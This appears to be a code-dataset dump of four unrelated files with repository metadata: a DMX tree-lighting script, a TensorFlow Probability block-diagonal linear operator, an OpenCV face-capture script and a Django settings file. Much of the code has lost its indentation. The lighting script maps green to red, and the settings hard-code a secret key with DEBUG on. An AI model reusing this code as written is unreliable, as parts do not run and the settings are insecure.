                    br.brindex = brcount
                    self.branches.append(br)
                    brcount += 1
    def print_config(self):
        """ print the dmx configuration """
        for pod in self.pods:
            for lb in pod.limbs:
                print '%s limb %s ' % (pod.name, lb.name)
                for br in lb.branches:
                    br.printInfo()
                sys.stdout.flush()
# if running from the console, do some test stuff
if __name__ == '__main__':
# make the DMX data structure from the config file
treeDMX = AuroraDMX('mapDMX.cfg')
# print it out for debug
if sys.argv[1] == 'c':
treeDMX.print_config()
exit()
if len(sys.argv) < 4:
print """usage: aurora.py l b color
sets limb l on branch b (ints) to color where
color is one of red, blue, green, white, off, cyan, magenta, yellow"""
exit()
if sys.argv[3][0] == 'r':
color = (255, 0, 0)
elif sys.argv[3][0] == 'g':
color = (255, 0, 0)
elif sys.argv[3][0] == 'b':
color = (0, 0, 255)
elif sys.argv[3][0] == 'w':
color = (255, 255, 255)
elif sys.argv[3][0] == 'o':
color = (0, 0, 0)
elif sys.argv[3][0] == 'c':
color = (0, 255, 255)
elif sys.argv[3][0] == 'm':
color = (255, 0, 255)
elif sys.argv[3][0] == 'y':
color = (255, 255, 0)
else:
print 'unrecognized color "%s"' % sys.argv[3]
exit()
limb = int(sys.argv[1])
branch = int(sys.argv[2])
l = treeDMX.limblist[limb]
b = l.branches[branch]
print str(b)
treeDMX.setBranchRGB(b.brindex, color)
sys.stdout.flush()
treeDMX.TreeSend()
time.sleep(0.1) # give threads a chance to work
| [
"rrmutt@gmail.com"
] | rrmutt@gmail.com |
b82c5691d93f85bfb3f0a5405b79ca804500f2c4 | 2e8ff2eb86f34ce2fc330766906b48ffc8df0dab | /tensorflow_probability/python/internal/backend/numpy/gen/linear_operator_block_diag.py | 6aeec93a59471c9f85ff8fffe030e4d7812c59de | [
"Apache-2.0"
] | permissive | wataruhashimoto52/probability | 9613f9a3cc685ff1a20643c4a05a48f9cf0fe1ae | 12e3f256544eadea6e863868da825614f4423eb0 | refs/heads/master | 2021-07-16T18:44:25.970036 | 2020-06-14T02:48:29 | 2020-06-14T02:51:59 | 146,873,495 | 0 | 0 | Apache-2.0 | 2018-08-31T09:51:20 | 2018-08-31T09:51:20 | null | UTF-8 | Python | false | false | 28,763 | py | # Copyright 2020 The TensorFlow Probability Authors. All Rights Reserved.
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# THIS FILE IS AUTO-GENERATED BY `gen_linear_operators.py`.
# DO NOT MODIFY DIRECTLY.
# @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# pylint: disable=g-import-not-at-top
# pylint: disable=g-direct-tensorflow-import
# pylint: disable=g-bad-import-order
# pylint: disable=unused-import
# pylint: disable=line-too-long
# pylint: disable=reimported
# pylint: disable=g-bool-id-comparison
# pylint: disable=g-statement-before-imports
# pylint: disable=bad-continuation
# pylint: disable=useless-import-alias
# pylint: disable=property-with-parameters
# pylint: disable=trailing-whitespace
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create a Block Diagonal operator from one or more `LinearOperators`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_probability.python.internal.backend.numpy import ops as common_shapes
from tensorflow_probability.python.internal.backend.numpy import dtype as dtypes
from tensorflow_probability.python.internal.backend.numpy import ops
from tensorflow_probability.python.internal.backend.numpy.gen import tensor_shape
from tensorflow_probability.python.internal.backend.numpy import numpy_array as array_ops
from tensorflow_probability.python.internal.backend.numpy import debugging as check_ops
from tensorflow_probability.python.internal.backend.numpy import control_flow as control_flow_ops
from tensorflow_probability.python.internal.backend.numpy.gen import linear_operator
from tensorflow_probability.python.internal.backend.numpy.gen import linear_operator_algebra
from tensorflow_probability.python.internal.backend.numpy.gen import linear_operator_util
# from tensorflow.python.util.tf_export import tf_export
__all__ = ["LinearOperatorBlockDiag"]
# @tf_export("linalg.LinearOperatorBlockDiag")
class LinearOperatorBlockDiag(linear_operator.LinearOperator):
"""Combines one or more `LinearOperators` in to a Block Diagonal matrix.
This operator combines one or more linear operators `[op1,...,opJ]`,
building a new `LinearOperator`, whose underlying matrix representation is
square and has each operator `opi` on the main diagonal, and zero's elsewhere.
#### Shape compatibility
If `opj` acts like a [batch] square matrix `Aj`, then `op_combined` acts like
the [batch] square matrix formed by having each matrix `Aj` on the main
diagonal.
Each `opj` is required to represent a square matrix, and hence will have
shape `batch_shape_j + [M_j, M_j]`.
If `opj` has shape `batch_shape_j + [M_j, M_j]`, then the combined operator
has shape `broadcast_batch_shape + [sum M_j, sum M_j]`, where
`broadcast_batch_shape` is the mutual broadcast of `batch_shape_j`,
`j = 1,...,J`, assuming the intermediate batch shapes broadcast.
Even if the combined shape is well defined, the combined operator's
methods may fail due to lack of broadcasting ability in the defining
operators' methods.
Arguments to `matmul`, `matvec`, `solve`, and `solvevec` may either be single
`Tensor`s or lists of `Tensor`s that are interpreted as blocks. The `j`th
element of a blockwise list of `Tensor`s must have dimensions that match
`opj` for the given method. If a list of blocks is input, then a list of
blocks is returned as well.
```python
# Create a 4 x 4 linear operator combined of two 2 x 2 operators.
operator_1 = LinearOperatorFullMatrix([[1., 2.], [3., 4.]])
operator_2 = LinearOperatorFullMatrix([[1., 0.], [0., 1.]])
operator = LinearOperatorBlockDiag([operator_1, operator_2])
operator.to_dense()
==> [[1., 2., 0., 0.],
[3., 4., 0., 0.],
[0., 0., 1., 0.],
[0., 0., 0., 1.]]
tensor_shape.TensorShape(operator.shape)
==> [4, 4]
operator.log_abs_determinant()
==> scalar Tensor
x1 = ... # Shape [2, 2] Tensor
x2 = ... # Shape [2, 2] Tensor
x = tf.concat([x1, x2], 0) # Shape [2, 4] Tensor
operator.matmul(x)
==> tf.concat([operator_1.matmul(x1), operator_2.matmul(x2)])
# Create a [2, 3] batch of 4 x 4 linear operators.
matrix_44 = tf.random.normal(shape=[2, 3, 4, 4])
operator_44 = LinearOperatorFullMatrix(matrix)
# Create a [1, 3] batch of 5 x 5 linear operators.
matrix_55 = tf.random.normal(shape=[1, 3, 5, 5])
operator_55 = LinearOperatorFullMatrix(matrix_55)
# Combine to create a [2, 3] batch of 9 x 9 operators.
operator_99 = LinearOperatorBlockDiag([operator_44, operator_55])
# Create a shape [2, 3, 9] vector.
x = tf.random.normal(shape=[2, 3, 9])
operator_99.matmul(x)
==> Shape [2, 3, 9] Tensor
# Create a blockwise list of vectors.
x = [tf.random.normal(shape=[2, 3, 4]), tf.random.normal(shape=[2, 3, 5])]
operator_99.matmul(x)
==> [Shape [2, 3, 4] Tensor, Shape [2, 3, 5] Tensor]
```
#### Performance
The performance of `LinearOperatorBlockDiag` on any operation is equal to
the sum of the individual operators' operations.
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite, square`.
These have the following meaning:
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
operators,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
is_square=True,
name=None):
r"""Initialize a `LinearOperatorBlockDiag`.
`LinearOperatorBlockDiag` is initialized with a list of operators
`[op_1,...,op_J]`.
Args:
operators: Iterable of `LinearOperator` objects, each with
the same `dtype` and composable shape.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose.
is_positive_definite: Expect that this operator is positive definite,
meaning the quadratic form `x^H A x` has positive real part for all
nonzero `x`. Note that we do not require the operator to be
self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix#Extension_for_non-symmetric_matrices
is_square: Expect that this operator acts like square [batch] matrices.
This is true by default, and will raise a `ValueError` otherwise.
name: A name for this `LinearOperator`. Default is the individual
operators names joined with `_o_`.
Raises:
TypeError: If all operators do not have the same `dtype`.
ValueError: If `operators` is empty or are non-square.
"""
# Validate operators.
check_ops.assert_proper_iterable(operators)
operators = list(operators)
if not operators:
raise ValueError(
"Expected a non-empty list of operators. Found: %s" % operators)
self._operators = operators
# Define diagonal operators, for functions that are shared across blockwise
# `LinearOperator` types.
self._diagonal_operators = operators
# Validate dtype.
dtype = operators[0].dtype
for operator in operators:
if operator.dtype != dtype:
name_type = (str((o.name, o.dtype)) for o in operators)
raise TypeError(
"Expected all operators to have the same dtype. Found %s"
% " ".join(name_type))
# Auto-set and check hints.
if all(operator.is_non_singular for operator in operators):
if is_non_singular is False:
raise ValueError(
"The direct sum of non-singular operators is always non-singular.")
is_non_singular = True
if all(operator.is_self_adjoint for operator in operators):
if is_self_adjoint is False:
raise ValueError(
"The direct sum of self-adjoint operators is always self-adjoint.")
is_self_adjoint = True
if all(operator.is_positive_definite for operator in operators):
if is_positive_definite is False:
raise ValueError(
"The direct sum of positive definite operators is always "
"positive definite.")
is_positive_definite = True
if not (is_square and all(operator.is_square for operator in operators)):
raise ValueError(
"Can only represent a block diagonal of square matrices.")
# Initialization.
graph_parents = []
for operator in operators:
graph_parents.extend(operator.graph_parents)
if name is None:
# Using ds to mean direct sum.
name = "_ds_".join(operator.name for operator in operators)
with ops.name_scope(name, values=graph_parents):
super(LinearOperatorBlockDiag, self).__init__(
dtype=dtype,
graph_parents=None,
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=True,
name=name)
# TODO(b/143910018) Remove graph_parents in V3.
self._set_graph_parents(graph_parents)
@property
def operators(self):
return self._operators
def _block_range_dimensions(self):
return [op.range_dimension for op in self._diagonal_operators]
def _block_domain_dimensions(self):
return [op.domain_dimension for op in self._diagonal_operators]
def _block_range_dimension_tensors(self):
return [op.range_dimension_tensor() for op in self._diagonal_operators]
def _block_domain_dimension_tensors(self):
return [op.domain_dimension_tensor() for op in self._diagonal_operators]
def _shape(self):
# Get final matrix shape.
domain_dimension = sum(self._block_domain_dimensions())
range_dimension = sum(self._block_range_dimensions())
matrix_shape = tensor_shape.TensorShape([domain_dimension, range_dimension])
# Get broadcast batch shape.
# broadcast_shape checks for compatibility.
batch_shape = self.operators[0].batch_shape
for operator in self.operators[1:]:
batch_shape = common_shapes.broadcast_shape(
batch_shape, operator.batch_shape)
return batch_shape.concatenate(matrix_shape)
def _shape_tensor(self):
# Avoid messy broadcasting if possible.
if tensor_shape.TensorShape(self.shape).is_fully_defined():
return ops.convert_to_tensor(
tensor_shape.TensorShape(self.shape).as_list(), dtype=dtypes.int32, name="shape")
domain_dimension = sum(self._block_domain_dimension_tensors())
range_dimension = sum(self._block_range_dimension_tensors())
matrix_shape = array_ops.stack([domain_dimension, range_dimension])
# Dummy Tensor of zeros. Will never be materialized.
zeros = array_ops.zeros(shape=self.operators[0].batch_shape_tensor())
for operator in self.operators[1:]:
zeros += array_ops.zeros(shape=operator.batch_shape_tensor())
batch_shape = array_ops.shape(zeros)
return array_ops.concat((batch_shape, matrix_shape), 0)
def matmul(self, x, adjoint=False, adjoint_arg=False, name="matmul"):
"""Transform [batch] matrix `x` with left multiplication: `x --> Ax`.
```python
# Make an operator acting like batch matrix A. Assume tensor_shape.TensorShape(A.shape) = [..., M, N]
operator = LinearOperator(...)
tensor_shape.TensorShape(operator.shape) = [..., M, N]
X = ... # shape [..., N, R], batch matrix, R > 0.
Y = operator.matmul(X)
tensor_shape.TensorShape(Y.shape)
==> [..., M, R]
Y[..., :, r] = sum_j A[..., :, j] X[j, r]
```
Args:
x: `LinearOperator`, `Tensor` with compatible shape and same `dtype` as
`self`, or a blockwise iterable of `LinearOperator`s or `Tensor`s. See
class docstring for definition of shape compatibility.
adjoint: Python `bool`. If `True`, left multiply by the adjoint: `A^H x`.
adjoint_arg: Python `bool`. If `True`, compute `A x^H` where `x^H` is
the hermitian transpose (transposition and complex conjugation).
name: A name for this `Op`.
Returns:
A `LinearOperator` or `Tensor` with shape `[..., M, R]` and same `dtype`
as `self`, or if `x` is blockwise, a list of `Tensor`s with shapes that
concatenate to `[..., M, R]`.
"""
if isinstance(x, linear_operator.LinearOperator):
left_operator = self.adjoint() if adjoint else self
right_operator = x.adjoint() if adjoint_arg else x
if (right_operator.range_dimension is not None and
left_operator.domain_dimension is not None and
right_operator.range_dimension != left_operator.domain_dimension):
raise ValueError(
"Operators are incompatible. Expected `x` to have dimension"
" {} but got {}.".format(
left_operator.domain_dimension, right_operator.range_dimension))
with self._name_scope(name):
return linear_operator_algebra.matmul(left_operator, right_operator)
with self._name_scope(name):
arg_dim = -1 if adjoint_arg else -2
block_dimensions = (self._block_range_dimensions() if adjoint
else self._block_domain_dimensions())
if linear_operator_util.arg_is_blockwise(block_dimensions, x, arg_dim):
for i, block in enumerate(x):
if not isinstance(block, linear_operator.LinearOperator):
block = ops.convert_to_tensor(block)
# self._check_input_dtype(block)
block_dimensions[i].assert_is_compatible_with(tensor_shape.TensorShape(block.shape)[arg_dim])
x[i] = block
else:
x = ops.convert_to_tensor(x, name="x")
# self._check_input_dtype(x)
op_dimension = (self.range_dimension if adjoint
else self.domain_dimension)
op_dimension.assert_is_compatible_with(tensor_shape.TensorShape(x.shape)[arg_dim])
return self._matmul(x, adjoint=adjoint, adjoint_arg=adjoint_arg)
def _matmul(self, x, adjoint=False, adjoint_arg=False):
arg_dim = -1 if adjoint_arg else -2
block_dimensions = (self._block_range_dimensions() if adjoint
else self._block_domain_dimensions())
blockwise_arg = linear_operator_util.arg_is_blockwise(
block_dimensions, x, arg_dim)
if blockwise_arg:
split_x = x
else:
split_dim = -1 if adjoint_arg else -2
# Split input by rows normally, and otherwise columns.
split_x = linear_operator_util.split_arg_into_blocks(
self._block_domain_dimensions(),
self._block_domain_dimension_tensors,
x, axis=split_dim)
result_list = []
for index, operator in enumerate(self.operators):
result_list += [operator.matmul(
split_x[index], adjoint=adjoint, adjoint_arg=adjoint_arg)]
if blockwise_arg:
return result_list
result_list = linear_operator_util.broadcast_matrix_batch_dims(
result_list)
return array_ops.concat(result_list, axis=-2)
def matvec(self, x, adjoint=False, name="matvec"):
"""Transform [batch] vector `x` with left multiplication: `x --> Ax`.
```python
# Make an operator acting like batch matric A. Assume tensor_shape.TensorShape(A.shape) = [..., M, N]
operator = LinearOperator(...)
X = ... # shape [..., N], batch vector
Y = operator.matvec(X)
tensor_shape.TensorShape(Y.shape)
==> [..., M]
Y[..., :] = sum_j A[..., :, j] X[..., j]
```
Args:
x: `Tensor` with compatible shape and same `dtype` as `self`, or an
iterable of `Tensor`s (for blockwise operators). `Tensor`s are treated
a [batch] vectors, meaning for every set of leading dimensions, the last
dimension defines a vector.
See class docstring for definition of compatibility.
adjoint: Python `bool`. If `True`, left multiply by the adjoint: `A^H x`.
name: A name for this `Op`.
Returns:
A `Tensor` with shape `[..., M]` and same `dtype` as `self`.
"""
with self._name_scope(name):
block_dimensions = (self._block_range_dimensions() if adjoint
else self._block_domain_dimensions())
if linear_operator_util.arg_is_blockwise(block_dimensions, x, -1):
for i, block in enumerate(x):
if not isinstance(block, linear_operator.LinearOperator):
block = ops.convert_to_tensor(block)
# self._check_input_dtype(block)
block_dimensions[i].assert_is_compatible_with(tensor_shape.TensorShape(block.shape)[-1])
x[i] = block
x_mat = [block[..., _ops.newaxis] for block in x]
y_mat = self.matmul(x_mat, adjoint=adjoint)
return [array_ops.squeeze(y, axis=-1) for y in y_mat]
x = ops.convert_to_tensor(x, name="x")
# self._check_input_dtype(x)
op_dimension = (self.range_dimension if adjoint
else self.domain_dimension)
op_dimension.assert_is_compatible_with(tensor_shape.TensorShape(x.shape)[-1])
x_mat = x[..., _ops.newaxis]
y_mat = self.matmul(x_mat, adjoint=adjoint)
return array_ops.squeeze(y_mat, axis=-1)
def _determinant(self):
    # The determinant factors into the product of the per-block
    # determinants (see _to_dense: the blocks sit on the diagonal).
    dets = [op.determinant() for op in self.operators]
    result = dets[0]
    for det in dets[1:]:
        result *= det
    return result
def _log_abs_determinant(self):
    # log|det| is additive across the diagonal blocks.
    terms = [op.log_abs_determinant() for op in self.operators]
    result = terms[0]
    for term in terms[1:]:
        result += term
    return result
def solve(self, rhs, adjoint=False, adjoint_arg=False, name="solve"):
    """Solve (exact or approx) `R` (batch) systems of equations: `A X = rhs`.

    The returned `Tensor` will be close to an exact solution if `A` is
    well conditioned; otherwise closeness will vary.  `rhs` may be a
    single `Tensor`, a `LinearOperator`, or (for blockwise operators) a
    list of per-block [batch] matrices.

    Args:
      rhs: `Tensor` with the same `dtype` as this operator and compatible
        shape, or a list of `Tensor`s, or a `LinearOperator`.
      adjoint: Python `bool`.  If `True`, solve `A^H X = rhs`.
      adjoint_arg: Python `bool`.  If `True`, solve `A X = rhs^H` where
        `rhs^H` is the hermitian transpose.
      name: A name scope to use for ops added by this method.

    Returns:
      `Tensor` with shape `[..., N, R]` and the same `dtype` as `rhs`
      (a list of such `Tensor`s for blockwise input).

    Raises:
      NotImplementedError: If `self.is_non_singular` or `is_square` is
        False.
    """
    if self.is_non_singular is False:
        raise NotImplementedError(
            "Exact solve not implemented for an operator that is expected to "
            "be singular.")
    if self.is_square is False:
        raise NotImplementedError(
            "Exact solve not implemented for an operator that is expected to "
            "not be square.")
    if isinstance(rhs, linear_operator.LinearOperator):
        # Operator rhs: dispatch to the operator-algebra solve.
        left_op = self.adjoint() if adjoint else self
        right_op = rhs.adjoint() if adjoint_arg else rhs
        if (right_op.range_dimension is not None and
            left_op.domain_dimension is not None and
            right_op.range_dimension != left_op.domain_dimension):
            raise ValueError(
                "Operators are incompatible. Expected `rhs` to have dimension"
                " {} but got {}.".format(
                    left_op.domain_dimension, right_op.range_dimension))
        with self._name_scope(name):
            return linear_operator_algebra.solve(left_op, right_op)
    with self._name_scope(name):
        block_dims = (self._block_domain_dimensions() if adjoint
                      else self._block_range_dimensions())
        # adjoint_arg means rhs arrives transposed, so the dimension to
        # check moves from -2 to -1.
        arg_dim = -1 if adjoint_arg else -2
        blockwise = linear_operator_util.arg_is_blockwise(
            block_dims, rhs, arg_dim)
        if blockwise:
            # Validate each plain-tensor block in place.
            split_rhs = rhs
            for i, block in enumerate(split_rhs):
                if not isinstance(block, linear_operator.LinearOperator):
                    block = ops.convert_to_tensor(block)
                    block_dims[i].assert_is_compatible_with(
                        tensor_shape.TensorShape(block.shape)[arg_dim])
                    split_rhs[i] = block
        else:
            rhs = ops.convert_to_tensor(rhs, name="rhs")
            op_dim = (self.domain_dimension if adjoint
                      else self.range_dimension)
            op_dim.assert_is_compatible_with(
                tensor_shape.TensorShape(rhs.shape)[arg_dim])
            # Split input by rows normally, and otherwise columns.
            split_dim = -1 if adjoint_arg else -2
            split_rhs = linear_operator_util.split_arg_into_blocks(
                self._block_domain_dimensions(),
                self._block_domain_dimension_tensors,
                rhs, axis=split_dim)
        # Each block solves its own slice of the system independently.
        solutions = [
            op.solve(split_rhs[i], adjoint=adjoint, adjoint_arg=adjoint_arg)
            for i, op in enumerate(self.operators)]
        if blockwise:
            return solutions
        solutions = linear_operator_util.broadcast_matrix_batch_dims(solutions)
        return array_ops.concat(solutions, axis=-2)
def solvevec(self, rhs, adjoint=False, name="solve"):
    """Solve single equation with best effort: `A X = rhs`.

    The returned `Tensor` will be close to an exact solution if `A` is
    well conditioned; otherwise closeness will vary.  `rhs` may be a
    single [batch] vector or (for blockwise operators) a list of
    per-block [batch] vectors.

    Args:
      rhs: `Tensor` with the same `dtype` as this operator, or a list of
        `Tensor`s; the last dimension is the vector dimension.
      adjoint: Python `bool`.  If `True`, solve `A^H X = rhs`.
      name: A name scope to use for ops added by this method.

    Returns:
      `Tensor` with shape `[..., N]` and the same `dtype` as `rhs`
      (a list of such `Tensor`s for blockwise input).

    Raises:
      NotImplementedError: If `self.is_non_singular` or `is_square` is
        False.
    """
    with self._name_scope(name):
        block_dims = (self._block_domain_dimensions() if adjoint
                      else self._block_range_dimensions())
        if linear_operator_util.arg_is_blockwise(block_dims, rhs, -1):
            # Validate each plain-tensor block in place.
            for i, block in enumerate(rhs):
                if not isinstance(block, linear_operator.LinearOperator):
                    block = ops.convert_to_tensor(block)
                    block_dims[i].assert_is_compatible_with(
                        tensor_shape.TensorShape(block.shape)[-1])
                    rhs[i] = block
            # Solve against one-column matrices, then drop the column axis.
            columns = [array_ops.expand_dims(block, axis=-1) for block in rhs]
            solutions = self.solve(columns, adjoint=adjoint)
            return [array_ops.squeeze(s, axis=-1) for s in solutions]
        rhs = ops.convert_to_tensor(rhs, name="rhs")
        op_dim = (self.domain_dimension if adjoint
                  else self.range_dimension)
        op_dim.assert_is_compatible_with(tensor_shape.TensorShape(rhs.shape)[-1])
        solution = self.solve(array_ops.expand_dims(rhs, axis=-1),
                              adjoint=adjoint)
        return array_ops.squeeze(solution, axis=-1)
def _diag_part(self):
    # Collect each block's diagonal as a column vector so the batch
    # dimensions can be broadcast, concatenate along the row axis, then
    # drop the trailing singleton axis again.
    parts = [op.diag_part()[..., _ops.newaxis] for op in self.operators]
    parts = linear_operator_util.broadcast_matrix_batch_dims(parts)
    return array_ops.squeeze(array_ops.concat(parts, axis=-2), axis=-1)
def _trace(self):
    # The trace is additive across the diagonal blocks.
    traces = [op.trace() for op in self.operators]
    result = traces[0]
    for t in traces[1:]:
        result += t
    return result
def _to_dense(self):
    # Broadcast every block to a shared batch shape, then pad each block
    # with zeros on its left and right so the blocks line up on the
    # diagonal when the rows are stacked.
    blocks = linear_operator_util.broadcast_matrix_batch_dims(
        [op.to_dense() for op in self.operators])
    rows = []
    cols_so_far = 0
    for block in blocks:
        batch_row_shape = array_ops.shape(block)[:-1]
        # Zeros to the left of this block: everything already emitted.
        left = array_ops.zeros(
            shape=array_ops.concat([batch_row_shape, [cols_so_far]], axis=-1),
            dtype=block.dtype)
        cols_so_far += array_ops.shape(block)[-1]
        # Zeros to the right: the remaining columns of the operator.
        right = array_ops.zeros(
            shape=array_ops.concat(
                [batch_row_shape,
                 [self.domain_dimension_tensor() - cols_so_far]], axis=-1),
            dtype=block.dtype)
        rows.append(array_ops.concat([left, block, right], axis=-1))
    mat = array_ops.concat(rows, axis=-2)
    tensorshape_util.set_shape(mat, tensor_shape.TensorShape(self.shape))
    return mat
def _assert_non_singular(self):
    # The whole operator is non-singular iff every block is.
    checks = [op.assert_non_singular() for op in self.operators]
    return control_flow_ops.group(checks)
def _assert_self_adjoint(self):
    # Self-adjointness is checked per block.
    checks = [op.assert_self_adjoint() for op in self.operators]
    return control_flow_ops.group(checks)
def _assert_positive_definite(self):
    # Positive definiteness is checked per block.
    checks = [op.assert_positive_definite() for op in self.operators]
    return control_flow_ops.group(checks)
def _eigvals(self):
    # Gather each block's eigenvalues as a column vector so batch
    # dimensions can be broadcast, concatenate, then drop the trailing
    # singleton axis.
    parts = [op.eigvals()[..., _ops.newaxis] for op in self.operators]
    parts = linear_operator_util.broadcast_matrix_batch_dims(parts)
    return array_ops.squeeze(array_ops.concat(parts, axis=-2), axis=-1)
import numpy as np
from tensorflow_probability.python.internal.backend.numpy import linalg_impl as _linalg
from tensorflow_probability.python.internal.backend.numpy import ops as _ops
from tensorflow_probability.python.internal.backend.numpy.gen import tensor_shape
from tensorflow_probability.python.internal.backend.numpy import private
distribution_util = private.LazyLoader(
"distribution_util", globals(),
"tensorflow_probability.python.internal._numpy.distribution_util")
tensorshape_util = private.LazyLoader(
"tensorshape_util", globals(),
"tensorflow_probability.python.internal._numpy.tensorshape_util")
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
18daa4fb284bc101f6bf7689e10db76e2acbb98e | 85ffd3121df98bfcb33de50520fbd1846500033d | /0_training_data_collection.py | 7198d32aa31189ce36ae0858e21a1b903360bdb5 | [] | no_license | Jakksan/BullyhackFall2020 | bd846308d83367edf579a64452fb93734c5146a1 | 0bbc00bd6d19fe3ef9ea1eab70ba2d2630e383bf | refs/heads/master | 2020-12-09T12:48:20.670768 | 2020-01-12T04:26:52 | 2020-01-12T04:26:52 | 233,308,372 | 0 | 0 | null | 2020-01-12T11:04:43 | 2020-01-11T22:53:05 | Python | UTF-8 | Python | false | false | 1,697 | py | import cv2
# Open the default webcam for training-image capture.
vid_cam = cv2.VideoCapture(0)
# Four Haar cascades: three frontal-face variants plus a profile-face
# detector, so faces are captured from several angles.
face0_detector = cv2.CascadeClassifier('./dataset/haarcascade_frontalface_default.xml')
face1_detector = cv2.CascadeClassifier('./dataset/haarcascade_frontalface_alt.xml')
face2_detector = cv2.CascadeClassifier('./dataset/haarcascade_frontalface_alt2.xml')
profile_detector = cv2.CascadeClassifier('./dataset/haarcascade_profileface.xml')
# NOTE(review): face_id and profile_id are defined but never read below;
# the literal ids 1-4 are passed to generate_rectangle instead.
face_id = 1
profile_id = 2
frames = 0   # number of frames processed so far (capture stops after 100)
# Per-detector counters used to number the saved crop files.
count0 = 0
count1 = 0
count2 = 0
count3 = 0
def generate_rectangle(focus, screen, gray_img, id, tuple_color, counter):
    """Annotate detections on `screen` and save a crop of each one.

    For every (x, y, w, h) detection in `focus`, draws a rectangle in
    `tuple_color` on `screen`, saves a 100x100 grayscale crop under
    dataset/images/ named with `id` and a running counter, then shows
    the annotated frame.  Returns the updated counter.
    """
    count = counter
    for (x, y, w, h) in focus:
        cv2.rectangle(screen, (x, y), (x + w, y + h), tuple_color, 2)
        count += 1
        crop = cv2.resize(gray_img[y:y + h, x:x + w], dsize=(100, 100))
        cv2.imwrite("dataset/images/User." + str(id) + '.' + str(count) + ".jpg", crop)
    cv2.imshow('Training...', screen)
    return count
# Main capture loop: read frames, run all four detectors, annotate and
# save crops, until 'q' is pressed or 100 frames have been processed.
while(vid_cam.isOpened()):
    # NOTE(review): `ret` is never checked, so a failed read would pass
    # an invalid frame to cvtColor — confirm against the capture source.
    ret, image_frame = vid_cam.read()
    gray = cv2.cvtColor(image_frame, cv2.COLOR_BGR2GRAY)
    # Run every cascade on the grayscale frame (scaleFactor=1.3,
    # minNeighbors=5).
    faces0 = face0_detector.detectMultiScale(gray, 1.3, 5)
    faces1 = face1_detector.detectMultiScale(gray, 1.3, 5)
    faces2 = face2_detector.detectMultiScale(gray, 1.3, 5)
    profiles = profile_detector.detectMultiScale(gray, 1.3, 5)
    # Each detector keeps its own file counter and rectangle colour.
    count0=generate_rectangle(faces0, image_frame, gray, 1, (255,0,0), count0)
    count1=generate_rectangle(faces1, image_frame, gray, 2, (0,255,0), count1)
    count2=generate_rectangle(faces2, image_frame, gray, 3, (0,0,255), count2)
    count3=generate_rectangle(profiles, image_frame, gray,4, (30,200,0), count3)
    frames += 1
    # Stop on 'q' keypress, or after 100 frames.
    if cv2.waitKey(100) & 0xFF == ord('q'):
        break
    elif frames>100:
        break
# Release the camera and close the preview window.
vid_cam.release()
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | Jakksan.noreply@github.com |
c044a87fec98fd4c8f583256862bdd4bcb527320 | 863081639cf34d31a33e8153420d8f9e4cfdb33e | /fmovies/settings.py | 79737b97c590465c2fa32ee392061c43959af829 | [
"MIT"
] | permissive | harisnaeemofficial/fmovies | e674fb284c33377508d879d3a307119cece6a6f2 | 26b9a033db8b6eea7de281b96679b47dc15e303f | refs/heads/master | 2021-06-09T17:32:23.778873 | 2016-11-24T23:28:47 | 2016-11-24T23:28:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,301 | py | """
Django settings for fmovies project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and
# load it from an environment variable before any deployment.
SECRET_KEY = '@nko9yvj2ul(wgf^4*4@f)pwy8dkc1oo&hh97fke8u92l#mdn+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Empty list is only valid while DEBUG is True; production needs the
# served hostnames listed here.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'scraper',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'fmovies.urls'
TEMPLATE_DIR = os.path.join(BASE_DIR, 'templates/')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
